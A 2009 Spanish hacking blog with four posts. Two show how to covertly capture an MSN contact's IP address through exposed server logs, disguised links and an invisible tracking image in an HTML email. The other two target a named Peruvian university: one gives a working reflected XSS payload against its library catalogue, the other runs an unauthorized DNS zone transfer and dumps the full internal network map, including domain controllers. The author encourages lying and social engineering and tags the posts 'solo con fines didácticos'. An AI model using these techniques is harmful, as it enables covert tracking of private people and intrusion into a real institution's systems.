miércoles, 30 de diciembre de 2009

Averiguar la IP de tus contactos de MSN (Parte II)

Continuamos con los métodos para averiguar la IP de los contactos de MSN...

Método 0.5: Enviar un email trucado.

A éste método le puse 0.5 por que no es un método nuevo sino una forma especial de aplicar el método anterior (es recomendable leerlo primero):


La parte mas difícil del método 0 es lograr que tu contacto de clic en el link que le mandas. Para eso hay que aplicar algo de "ingeniería social", tener un argumento creíble, ser natural y saber mentir. No hay algoritmo para esto, es un don. O lo tenemos o no.

Así que si no logramos conseguir que nuestro contacto de clic en el link. Aun podemos intentar que lo haga de forma indirecta y sin darse cuenta. Ese es el objetivo de este método.

En realidad no necesitamos que nuestro contacto visite el link directamente para que sus datos se queden grabados. Lo único que necesitamos es que él pida un recurso que esté en ese servidor. ¿Entiendes la diferencia? Me explico, una de las grandes ventajas de la web es la reutilización de recursos. Podemos construir un sitio web utilizando recursos de servidores externos (imágenes, vídeos, sonidos, scripts, hojas de estilo, etc.) simplemente haciendo referencia a esos recursos en el código HTML de nuestra web. Luego cuando alguien visite nuestra web su navegador entenderá que debe solicitar esos recursos a otros servidores y lo hará automáticamente.

Por ejemplo este código solicita una imagen de Google:

<img src="http://www.google.com/favicon.ico">

Lo que haremos sera enviarle un email a nuestro contacto con una orden HTML para que inserte en el mensaje una imagen alojada en un servidor del cual podamos leer los logs. Así que cuando nuestro contacto abra el email su navegador solicitara la imagen y sus datos quedaran registrados en dicho servidor. No es necesario que la imagen exista. Usaremos el nombre de la imagen para identificar la IP de nuestro contacto.

Seguiré usando los logs del ejemplo del método 0:


El código para insertar la imagen sería:

<img src="http://www.yellowcreeksbesthunting.com/nombre_contacto.jpg" width=0 height=0 border=0>

Los atributos width=0, height=0 y border=0 son para que la imagen no sea visible.

Para insertar este código en el email tenemos que que editar el mensaje en HTML. En Hotmail le damos clic a "Nuevo" luego a "Texto enriquecido" y seleccionamos "Editar en HTML" escribimos el código en el área de redacción y le damos clic a "Enviar". Eso es todo. Cuando tu contacto abra el correo su ip quedara registrada en los logs del servidor.

Bueno, es todo. Gracias por leer. Espero que les haya gustado y que me haya dejado entender XD.

Hasta pronto.

martes, 29 de diciembre de 2009

Averiguar la IP de tus contactos de MSN (Parte I)

¿Alguna vez te ha sucedido que estas en tu MSN y de pronto alguien te habla y no sabes quien es? A mi muchas veces. En parte es culpa mía por aceptar todas las solicitudes que me llegan pero es que pienso y... ¿si es alguien que me conoce o un amigo de un foro o un interesado en este blog o una hermosa chica que me vio en el facebook y decidió agregarme? (bueno lo ultimo es poco probable pero quien sabe...) Claro que también podría ser un secuestrador roba órganos, una enamorada celosa, alguien que quiere sacarte información, la DIVINDAT, el FBI, la CIA, etc, etc... (¿Que, acaso no ven NCIS?)

¿Qué es lo primero que harías? Si claro yo también lo hago:

-Hola, ¿Quien eres? :)

Pero... ¿confiarías en lo que dicen? Bueno este post se trata de obtener algo mas de información sobre tus contactos, específicamente sobre como obtener la IP. ¿Y para que me sirve la IP? Bien pues puedes geolocalizar la IP y saber mas o menos de donde se conecta tu contacto. Estas paginas te pueden ayudar:

http://www.elhacker.net/elhackernet/geolocalizacion.html
http://ip2loc.jerodsanto.net/

También puedes intentar entrar a su router y obtener mas datos.

Bueno empecemos...

Metodo 0: Usar logs de webs mal configuradas.

Los servidores web normalmente guardan logs (registros) de los usuarios que se conectan a su sitio web. En estos logs se incluye la IP del visitante, la solicitud HTTP, algunos headers como el User-Agent (navegador y sistema operativo) o el Referer. Los logs se guardan en texto plano en un archivo llamado "access.log" que no debería estar accesible a visitantes.

Lo que haremos sera buscar un servidor web mal configurado que deje accesible su archivo de logs y luego enviarle al contacto un link a alguna pagina de ese servidor. Si nuestro contacto clickea el link entonces el servidor guardara sus datos y ya solo nos queda ver los logs para tener su IP.

Buscamos el servidor mal configurado en Google:

http://www.google.com.pe/search?q=inurl%3Aaccess.log+filetype%3Alog

Hay muchos, escoge uno parecido a este:

http://www.yellowcreeksbesthunting.com/logs/access.log

Cada registro ocupa una linea y tiene mas o menos este formato:

[IP] [FECHA] [SOLICITUD] [RESPUESTA] [REFERER] [USER-AGENT] [HOST]

Si estas viendo los logs, al final deberías ver tu dirección IP. Si no la ves actualiza la pagina. Si no sabes cual es tu IP mira este sitio:

http://www.whatismyip.com/

Bueno y... ¿Como reconoceremos la IP de nuestro contacto? Para ello usaremos el campo de la solicitud haciendo que pida un recurso que no existe y luego buscamos la IP que solicito ese recurso. Además los últimos logs siempre están al final.

Entonces el link que le enviaremos al contacto seria mas o menos asi:

http://www.yellowcreeksbesthunting.com/recurso_que_no_existe.html

Si no queremos mostrar el link de forma tan directa podemos ocultarlo en paginas como esta:

http://hide-url.net/

y quedaría de esta forma:

http://hide-url.net/cca7a230

También podemos camuflarlo explotando alguna vulnerabilidad XSS como se explica en este post:

http://alguienenlafisi.blogspot.com/2009/12/vulnerabilidad-xss-en-el-sistema-de.html

Este es el log del ejemplo:

190.232.145.172 - - [29/Dec/2009:18:10:42 -0800] "GET /recurso_que_no_existe.html HTTP/1.1" 404 - "http://hide-url.net/cca7a230" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3" "www.yellowcreeksbesthunting.com"

He resaltado mi IP que seria 190.232.145.172 (es dinámica así que seguro ya cambio) y el campo de solicitud donde se pide la pagina "recurso_que_no_existe.html". También se pueden observar otros datos como la versión de mi navegador Firefox/3.5.3 y mi sistema operativo Ubuntu/9.10 Karmic Koala.

Bueno eso es todo. Este método es uno de mis favoritos pues es muy sencillo y además nos da información extra ;)

Luego escribiré otras formas de obtener la IP pero en otros posts porque este ya ha crecido demasiado.

Hasta pronto.

Todo lo explicado aquí es solo con fines didácticos. El autor no se hace responsable del uso que se le pueda dar a esta información.

jueves, 17 de diciembre de 2009

Vulnerabilidad XSS en el sistema de bibliotecas

¿Que es una vulnerabilidad XSS? Veamos que nos dice la Wikipedia:

"XSS, del inglés Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado."

El articulo completo aqui.

Traduciendo nos dice que podemos añadir código HTML en las webs vulnerables. Este código puede ser ordenes javascript para realizar redirecciones, robo de cookies, modificar el documento original, etc. Esto se debe a un descuido del programador del sitio pues no valida las entradas de los formularios aceptando caracteres especiales y con ello la inyección del código.

Este error se presenta en el buscador del sistema de bibliotecas de la UNMSM.

La URL del buscador es:

http://catalogo-01.unmsm.edu.pe/sabini/sm1spa.htm

Testeamos el buscador escribiendo este codigo:

<script>alert('xss');</script>

Ahora le damos clic a "Buscar" y si todo salio bien debería aparecer una ventana de alerta con el mensaje "xss". Esto significa que la web es vulnerable a XSS. Posiblemente tu navegador bloquee la ejecucion del script y te avise como es el caso del IE8. Pero esto no quiere decir que la web no sea vulnerable solo que tu navegador es un poco mas seguro. Bueno hay que decirlo : punto para el IE8.

Una de las ventajas que tiene un atacante al explotar un XSS es la confianza del usuario en la web afectada, es decir, el usuario no sospecharía de la web pues conoce el sitio y cree que es seguro. Entonces el atacante puede formar un link malicioso que explote el XSS y camuflándolo bajo una URL del sitio afectado redirigir al usuario a otra dirección.

Bueno, ahora hagamos algo más que mostrar mensajes en pantalla. Haremos un link para redirigir a este blog explotando el XSS.

Si vemos el código fuente del buscador encontraremos estas lineas de código:

<form action="/cgi-bin/sm1spa" method="get" name="frmBuscar" align="left" onsubmit="frmBuscar.cmdBuscar.disabled=true ;return true;>

<input name="C2" size="50">

Quiere decir que el formulario se envía a "/cgi-bin/sm1spa" mediante el método "get" y el texto buscado va en la variable "C2". Con esos datos ya sabemos que la estructura del link sera:

http://catalogo-01.unmsm.edu.pe/cgi-bin/sm1spa?C2="[SCRIPT]"

Debemos reemplazar [SCRIPT] por el código que haga la redirección. El código para la redirección seria:

<script>document.location.href='http://alguienenlafisi.blogspot.com/'</script>

Con lo que el link completo queda así:


A primera vista parece un link a algún servidor de la UNMSM pero al darle clic nos enviara a éste blog.

Tal vez no parezca nada peligroso pero imagina que te redirijan a una de esas paginas que mueven la ventana por toda la pantalla y no se dejan cerrar. Puede llegar a ser muy fastidioso y claro nadie sospechó del link por que era un sitio de la universidad.

Bueno eso es todo, espero que les haya gustado.

Como reto podría ser explotar el XSS para mostrar el mensaje "cross site scripting detected". Créanme que no va a ser tan fácil como están pensando ;P

Hasta pronto.

Todo lo explicado aquí es solo con fines didácticos. El autor no se hace responsable del uso que se le pueda dar a esta información.

sábado, 12 de diciembre de 2009

Transferencia de zona en el DNS de la UNMSM

Hola, en esta oportunidad voy a hablarles de un error de configuración que encontré en el DNS de la universidad. Se trata de la posibilidad de hacer una transferencia de zona del DNS ¿Pero que es una transferencia de zona? Bueno el DNS de la universidad guarda toda la información del dominio "unmsm.edu.pe" es decir las IPs de todos los servidores de la UNMSM. Ahora bien se puede acceder a esa información realizando consultas DNS y resolver uno por uno los dominios que conocemos y eso es totalmente legitimo. Lo que no está permitido es pedirle al DNS que nos dé de una toda la información que guarda ya que esta información podría darle a un atacante una idea bastante clara de la estructura interna de la red y de la configuración del DNS. Bueno una transferencia de zona es justamente pedirle al DNS toda la información que guarda de su red y que éste nos la dé. Pero... ¿Por que el DNS aceptaría la transferencia de zona? Normalmente no solo existe un DNS en una red sino que pueden haber mas pero siempre uno de ellos es el principal o autoritativo él tiene la información actualizada del dominio y los demás sirven como apoyo por si es que el DNS principal se cae o simplemente para no sobrecargarlo. De vez en cuando los DNS's secundarios le piden al DNS autoritativo una transferencia de zona para actualizarse y almacenar la misma información que él y esto también esta permitido. Sin embargo ¿Que pasaría si una maquina cualquiera le pide al DNS autoritativo que le transfiera su zona? Lo normal es que el DNS rechace la solicitud pero dependiendo de que tan bien o mal configurado esté también podría aceptarla y eso es precisamente lo que esta pasando con el DNS de la universidad aunque solo acepta desde la red interna así que para hacerlo necesitaremos acceder a una de las maquinas de la universidad. Yo lo hice desde la videoteca.

Ahora explicare como...

Vamos a utilizar la herramienta nslookup que ya viene con windows. Asi que abrimos una consola y ejecutamos la orden "nslookup".

C:\Documents and Settings\Eestudio>nslookup
*** No se puede encontrar el nombre de servidor para la dirección 192.168.3.1: Non-existent domain
*** Los servidores predeterminados no están disponibles
Servidor predeterminado: UnKnown
Address: 192.168.3.1

>


Nos dice que el servidor DNS por defecto es 192.168.3.1 es decir la puerta de enlace. Pero este no guarda la informacion que queremos asi que le vamos a preguntar las IPs de los servidores DNS de la universidad.

> set type=ns
> unmsm.edu.pe
Servidor: UnKnown
Address: 192.168.3.1

unmsm.edu.pe nameserver = celendin.unmsm.edu.pe
unmsm.edu.pe nameserver = juliaca.unmsm.edu.pe
unmsm.edu.pe nameserver = urubamba.unmsm.edu.pe
unmsm.edu.pe nameserver = mochica.unmsm.edu.pe
unmsm.edu.pe nameserver = yungay.unmsm.edu.pe
celendin.unmsm.edu.pe internet address = 172.16.156.11
juliaca.unmsm.edu.pe internet address = 172.16.156.5
urubamba.unmsm.edu.pe internet address = 172.16.156.10
mochica.unmsm.edu.pe internet address = 172.28.24.51
yungay.unmsm.edu.pe internet address = 172.16.156.4


Ahi los vemos son 5 servidores escogemos cualquiera de ellos yo lo hize con el primero "celendin.unmsm.edu.pe" o lo que es lo mismo "172.16.156.11". Ahora le diremos a nslookup que use ese DNS para resolver las consultas.

> server 172.16.156.11
DNS request timed out.
timeout was 2 seconds.
Servidor predeterminado: [172.16.156.11]
Address: 172.16.156.11

>


Por ultimo pedimos una transferencia completa del dominio "unmsm.edu.pe".

> ls -d unmsm.edu.pe

Luego de un momento nos responderá...

[[172.16.156.11]]
unmsm.edu.pe. SOA celendin.unmsm.edu.pe admin.unmsm.edu.pe. (200344142 108000 900 864000 3600)
unmsm.edu.pe. A 172.16.156.20
unmsm.edu.pe. A 172.16.156.19
unmsm.edu.pe. A 172.16.156.10
unmsm.edu.pe. A 172.16.156.6
unmsm.edu.pe. A 172.28.24.51
unmsm.edu.pe. A 172.16.156.4
unmsm.edu.pe. A 172.16.156.11
unmsm.edu.pe. A 172.16.156.17
unmsm.edu.pe. A 172.16.156.5
unmsm.edu.pe. NS celendin.unmsm.edu.pe
unmsm.edu.pe. NS juliaca.unmsm.edu.pe
unmsm.edu.pe. NS urubamba.unmsm.edu.pe
unmsm.edu.pe. NS mochica.unmsm.edu.pe
unmsm.edu.pe. NS yungay.unmsm.edu.pe
unmsm.edu.pe. MX 1 abancay.unmsm.edu.pe
unmsm.edu.pe. TXT "v=spf1 mx -all"

6c51b446-0d68-4b8f-8bbd-c11b1f07e714._msdcs CNAME sbpri.sisbib.unmsm.edu.pe
730e17ca-5f0e-460a-9d1d-5a094d7dc76c._msdcs CNAME yungay.unmsm.edu.pe
84586033-b815-49d7-8a16-ad80c28d1d3f._msdcs CNAME juliaca.unmsm.edu.pe
a4c61a41-1251-43a2-8e9a-c5522c774342._msdcs CNAME camana.unmsm.edu.pe
bd6c65d5-a9d5-44f1-addb-397e8ab1ea3b._msdcs CNAME mochica.unmsm.edu.pe
d8c06ada-28b2-4ed4-b986-7d21ec34c3cb._msdcs CNAME urubamba.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=88, camana.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=88, urubamba.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=88, mochica.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=88, yungay.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=88, vicus.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=88, juliaca.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=88, pucallpa.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=88, celendin.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=389, yungay.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=389, urubamba.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=389, juliaca.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=389, pucallpa.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=389, vicus.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=389, camana.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=389, mochica.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs SRV priority=0, weight=100, port=389, celendin.unmsm.edu.pe
_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, camana.unmsm.edu.pe
_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, urubamba.unmsm.edu.pe
_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, mochica.unmsm.edu.pe
_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, yungay.unmsm.edu.pe
_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, vicus.unmsm.edu.pe
_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, juliaca.unmsm.edu.pe
_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, pucallpa.unmsm.edu.pe
_kerberos._tcp.dc._msdcs SRV priority=0, weight=100, port=88, celendin.unmsm.edu.pe
_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, yungay.unmsm.edu.pe
_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, urubamba.unmsm.edu.pe
_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, juliaca.unmsm.edu.pe
_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, pucallpa.unmsm.edu.pe
_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, vicus.unmsm.edu.pe
_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, camana.unmsm.edu.pe
_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, mochica.unmsm.edu.pe
_ldap._tcp.dc._msdcs SRV priority=0, weight=100, port=389, celendin.unmsm.edu.pe
_ldap._tcp.28884c43-0966-44bf-982a-66dfef264c56.domains._msdcs SRV priority=0, weight=100, port=389, yungay.unmsm.edu.pe
_ldap._tcp.28884c43-0966-44bf-982a-66dfef264c56.domains._msdcs SRV priority=0, weight=100, port=389, urubamba.unmsm.edu.pe
_ldap._tcp.28884c43-0966-44bf-982a-66dfef264c56.domains._msdcs SRV priority=0, weight=100, port=389, juliaca.unmsm.edu.pe
_ldap._tcp.28884c43-0966-44bf-982a-66dfef264c56.domains._msdcs SRV priority=0, weight=100, port=389, pucallpa.unmsm.edu.pe
_ldap._tcp.28884c43-0966-44bf-982a-66dfef264c56.domains._msdcs SRV priority=0, weight=100, port=389, vicus.unmsm.edu.pe
_ldap._tcp.28884c43-0966-44bf-982a-66dfef264c56.domains._msdcs SRV priority=0, weight=100, port=389, camana.unmsm.edu.pe
_ldap._tcp.28884c43-0966-44bf-982a-66dfef264c56.domains._msdcs SRV priority=0, weight=100, port=389, mochica.unmsm.edu.pe
_ldap._tcp.28884c43-0966-44bf-982a-66dfef264c56.domains._msdcs SRV priority=0, weight=100, port=389, celendin.unmsm.edu.pe
_ldap._tcp.bc29b8b2-027f-45ed-980b-7c3f3465f3fa.domains._msdcs SRV priority=0, weight=100, port=389, sbpri.sisbib.unmsm.edu.pe
e7550465-d750-420c-b57d-c444c0d148c1._msdcs CNAME vicus.unmsm.edu.pe
f3ebba03-cc2a-4d73-a8dc-72881ed1701a._msdcs CNAME pucallpa.unmsm.edu.pe
fb4fdfdc-d00f-4d1d-9ea0-f912de401d46._msdcs CNAME celendin.unmsm.edu.pe
gc._msdcs A 172.16.156.11
gc._msdcs A 172.28.24.51
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.gc._msdcs SRV priority=0, weight=100, port=3268, celendin.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.gc._msdcs SRV priority=0, weight=100, port=3268, mochica.unmsm.edu.pe
_ldap._tcp.gc._msdcs SRV priority=0, weight=100, port=3268, celendin.unmsm.edu.pe
_ldap._tcp.gc._msdcs SRV priority=0, weight=100, port=3268, mochica.unmsm.edu.pe
_ldap._tcp.pdc._msdcs SRV priority=0, weight=100, port=389, yungay.unmsm.edu.pe
_ldap._tcp.pdc._msdcs SRV priority=0, weight=100, port=389, celendin.unmsm.edu.pe
_gc._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=3268, celendin.unmsm.edu.pe
_gc._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=3268, mochica.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=88, camana.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=88, urubamba.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=88, mochica.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=88, yungay.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=88, vicus.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=88, juliaca.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=88, pucallpa.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=88, celendin.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=389, yungay.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=389, urubamba.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=389, juliaca.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=389, pucallpa.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=389, vicus.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=389, camana.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=389, mochica.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites SRV priority=0, weight=100, port=389, celendin.unmsm.edu.pe
_gc._tcp SRV priority=0, weight=100, port=3268, celendin.unmsm.edu.pe
_gc._tcp SRV priority=0, weight=100, port=3268, mochica.unmsm.edu.pe
_kerberos._tcp SRV priority=0, weight=100, port=88, camana.unmsm.edu.pe
_kerberos._tcp SRV priority=0, weight=100, port=88, urubamba.unmsm.edu.pe
_kerberos._tcp SRV priority=0, weight=100, port=88, mochica.unmsm.edu.pe
_kerberos._tcp SRV priority=0, weight=100, port=88, yungay.unmsm.edu.pe
_kerberos._tcp SRV priority=0, weight=100, port=88, vicus.unmsm.edu.pe
_kerberos._tcp SRV priority=0, weight=100, port=88, juliaca.unmsm.edu.pe
_kerberos._tcp SRV priority=0, weight=100, port=88, pucallpa.unmsm.edu.pe
_kerberos._tcp SRV priority=0, weight=100, port=88, celendin.unmsm.edu.pe
_kpasswd._tcp SRV priority=0, weight=100, port=464, camana.unmsm.edu.pe
_kpasswd._tcp SRV priority=0, weight=100, port=464, urubamba.unmsm.edu.pe
_kpasswd._tcp SRV priority=0, weight=100, port=464, mochica.unmsm.edu.pe
_kpasswd._tcp SRV priority=0, weight=100, port=464, yungay.unmsm.edu.pe
_kpasswd._tcp SRV priority=0, weight=100, port=464, vicus.unmsm.edu.pe
_kpasswd._tcp SRV priority=0, weight=100, port=464, juliaca.unmsm.edu.pe
_kpasswd._tcp SRV priority=0, weight=100, port=464, pucallpa.unmsm.edu.pe
_kpasswd._tcp SRV priority=0, weight=100, port=464, celendin.unmsm.edu.pe
_ldap._tcp SRV priority=0, weight=100, port=389, yungay.unmsm.edu.pe
_ldap._tcp SRV priority=0, weight=100, port=389, urubamba.unmsm.edu.pe
_ldap._tcp SRV priority=0, weight=100, port=389, juliaca.unmsm.edu.pe
_ldap._tcp SRV priority=0, weight=100, port=389, pucallpa.unmsm.edu.pe
_ldap._tcp SRV priority=0, weight=100, port=389, vicus.unmsm.edu.pe
_ldap._tcp SRV priority=0, weight=100, port=389, camana.unmsm.edu.pe
_ldap._tcp SRV priority=0, weight=100, port=389, mochica.unmsm.edu.pe
_ldap._tcp SRV priority=0, weight=100, port=389, celendin.unmsm.edu.pe
_kerberos._udp SRV priority=0, weight=100, port=88, camana.unmsm.edu.pe
_kerberos._udp SRV priority=0, weight=100, port=88, urubamba.unmsm.edu.pe
_kerberos._udp SRV priority=0, weight=100, port=88, mochica.unmsm.edu.pe
_kerberos._udp SRV priority=0, weight=100, port=88, yungay.unmsm.edu.pe
_kerberos._udp SRV priority=0, weight=100, port=88, vicus.unmsm.edu.pe
_kerberos._udp SRV priority=0, weight=100, port=88, juliaca.unmsm.edu.pe
_kerberos._udp SRV priority=0, weight=100, port=88, pucallpa.unmsm.edu.pe
_kerberos._udp SRV priority=0, weight=100, port=88, celendin.unmsm.edu.pe
_kpasswd._udp SRV priority=0, weight=100, port=464, camana.unmsm.edu.pe
_kpasswd._udp SRV priority=0, weight=100, port=464, urubamba.unmsm.edu.pe
_kpasswd._udp SRV priority=0, weight=100, port=464, mochica.unmsm.edu.pe
_kpasswd._udp SRV priority=0, weight=100, port=464, yungay.unmsm.edu.pe
_kpasswd._udp SRV priority=0, weight=100, port=464, vicus.unmsm.edu.pe
_kpasswd._udp SRV priority=0, weight=100, port=464, juliaca.unmsm.edu.pe
_kpasswd._udp SRV priority=0, weight=100, port=464, pucallpa.unmsm.edu.pe
_kpasswd._udp SRV priority=0, weight=100, port=464, celendin.unmsm.edu.pe
abancay A 172.16.156.6
administracion A 172.16.68.33
virtual.administracion A 172.16.68.4
admision A 172.28.16.90
intranet.admision A 172.28.16.7
r02.admision A 172.28.16.91
r03.admision A 172.28.16.92
r04.admision A 172.28.16.93
r05.admision A 172.28.16.94
r06.admision A 172.28.16.95
r07.admision A 172.16.156.87
r08.admision A 172.16.156.88
s01.admision A 172.16.156.81
s02.admision A 172.16.156.82
s03.admision A 172.16.156.83
s04.admision A 172.16.156.84
www.admision A 172.28.16.90
admision1 A 172.16.156.14
www.admision1 CNAME admision1.unmsm.edu.pe
admisionpg A 172.30.48.5
www.admisionpg A 172.30.48.5
alpha A 172.16.156.103
andromeda A 172.16.156.38
asdopen A 172.16.156.14
autoseguro A 172.16.160.16
biblioteca A 172.16.160.5
biblioteca-02 A 172.16.160.8
bioinformatica A 172.16.28.53
biologia A 172.16.156.14
camana A 172.16.156.19
campusvirtualfce A 172.16.12.4
campusvirtualfii A 172.16.156.76
catalogo-01 A 172.16.160.9
ccibc A 172.16.156.14
ccsm A 172.16.156.14
www.ccsm CNAME ccsm.unmsm.edu.pe
celectoral A 172.16.156.14
celendin A 172.16.156.11
cenprolid A 172.16.156.14
cepre A 172.16.156.14
chancay A 172.16.156.18
chavin A 172.16.156.8
chimu A 172.16.156.9
cinfo A 172.16.67.135
cinfo1 A 172.28.144.103
cinfo2 A 172.16.164.7
clinica A 172.16.180.5
contabilidad A 172.16.156.91
virtual.contabilidad A 172.16.156.14
correo A 172.16.156.42
correo MX 10 correo.unmsm.edu.pe
csi A 172.16.160.32
cvirtual A 172.16.88.31
cybertesis A 172.16.160.6
derecho A 172.16.156.14
economia A 172.16.12.4
virtual.economia A 172.16.12.7
electronica A 172.16.156.14
epg A 172.16.156.14
www.epg A 172.16.156.14
farmacia A 172.16.156.14
figmmg A 172.16.156.14
www.figmmg CNAME figmmg.unmsm.edu.pe
fisica A 172.16.56.5
ftp.fisica A 172.28.176.32
ftp A 172.16.156.15
ftp-bc A 172.16.160.10
geografica A 170.16.156.14
grupos A 172.16.156.41
grupos MX 10 grupos.unmsm.edu.pe
imprenta A 172.16.156.43
www.imprenta A 172.16.156.43
industrial A 172.16.24.5
infosanmarcos A 172.16.164.7
www.infosanmarcos A 172.16.164.7
jabber A 172.16.156.75
juliaca A 172.16.156.5
lcfm A 172.16.56.10
letras A 172.16.40.20
linux A 172.16.156.14
lurin A 172.16.156.39
maestranza A 172.16.156.14
mail A 172.16.156.69
mail MX 10 mail.unmsm.edu.pe
mail2 A 172.16.156.50
mail2 MX 10 mail2.unmsm.edu.pe
matematicas A 172.16.28.4
matricula A 172.16.156.52
medicina A 172.28.24.52
mhcf A 172.16.56.6
mochica A 172.28.24.51
museohn A 172.16.156.23
www.museohn A 172.16.156.23
nazca A 172.16.156.7
odontologia A 172.16.156.14
ogbu A 172.16.156.14
orion A 172.16.156.44
paracas A 172.16.156.14
pc000 A 172.16.56.163
www.peg A 172.16.156.14
postgradogeologia A 172.16.72.69
psicologia A 172.16.48.4
pucallpa A 172.16.156.20
quimica A 172.16.156.14
quipu A 172.16.156.24
quipucamayoc A 172.16.156.24
redtel A 172.16.156.14
REDTEL1 A 172.16.156.25
rrpp A 172.16.91.107
ftp.rrpp A 69.93.97.194
www.rrpp A 69.93.97.194
rsm014e A 172.16.157.14
rsm250e A 172.20.60.207
sad195e A 172.16.88.196
sad197 A 172.16.88.198
secgen A 172.16.91.102
www.secgen A 172.16.91.102
seguridad A 172.16.156.14
server-f A 172.16.156.6
server-g A 172.16.156.6
siaf A 172.16.91.104
sindusm A 172.16.156.14
sisbib A 172.16.160.4
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs.sisbib SRV priority=0, weight=100, port=88, sbpri.sisbib.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.dc._msdcs.sisbib SRV priority=0, weight=100, port=389, sbpri.sisbib.unmsm.edu.pe
_kerberos._tcp.dc._msdcs.sisbib SRV priority=0, weight=100, port=88, sbpri.sisbib.unmsm.edu.pe
_ldap._tcp.dc._msdcs.sisbib SRV priority=0, weight=100, port=389, sbpri.sisbib.unmsm.edu.pe
_ldap._tcp.pdc._msdcs.sisbib SRV priority=0, weight=100, port=389, sbpri.sisbib.unmsm.edu.pe
_kerberos._tcp.Nombre-predeterminado-primer-sitio._sites.sisbib SRV priority=0, weight=100, port=88, sbpri.sisbib.unmsm.edu.pe
_ldap._tcp.Nombre-predeterminado-primer-sitio._sites.sisbib SRV priority=0, weight=100, port=389, sbpri.sisbib.unmsm.edu.pe
_kerberos._tcp.sisbib SRV priority=0, weight=100, port=88, sbpri.sisbib.unmsm.edu.pe
_kpasswd._tcp.sisbib SRV priority=0, weight=100, port=464, sbpri.sisbib.unmsm.edu.pe
_ldap._tcp.sisbib SRV priority=0, weight=100, port=389, sbpri.sisbib.unmsm.edu.pe
